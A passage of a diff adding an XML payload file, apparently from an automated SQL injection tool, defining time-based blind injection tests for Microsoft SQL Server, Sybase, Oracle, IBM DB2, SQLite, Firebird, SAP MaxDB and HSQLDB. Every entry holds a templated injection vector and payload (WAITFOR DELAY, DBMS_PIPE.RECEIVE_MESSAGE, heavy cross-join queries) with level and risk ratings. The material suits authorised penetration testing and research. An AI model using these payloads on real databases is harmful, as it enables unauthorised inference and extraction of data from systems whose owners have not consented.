+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
